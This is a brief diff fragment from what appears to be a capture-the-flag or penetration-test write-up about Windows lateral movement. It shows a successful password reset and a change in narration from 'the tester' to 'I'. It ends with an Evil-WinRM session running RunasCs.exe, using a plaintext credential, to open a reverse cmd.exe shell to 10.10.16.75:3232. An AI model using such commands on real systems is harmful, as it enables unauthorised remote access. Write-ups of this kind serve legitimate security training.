- Published on

 [+] Password changed successfully!

-- However, the tester was still unable to authenticate using
+- However, I was still unable to authenticate using

-WinRM,ldap, orSMBbased authentication Methods. - So instead, the tester used the RunasCS tool.
+WinRM,LDAP, orSMBbased authentication methods. - So instead, I used the RunasCs tool.
 Created by @antonioCoco

 *Evil-WinRM* PS C:\Windows\Temp> ./RunasCs.exe ee.reed Wild1234! cmd.exe -r 10.10.16.75:3232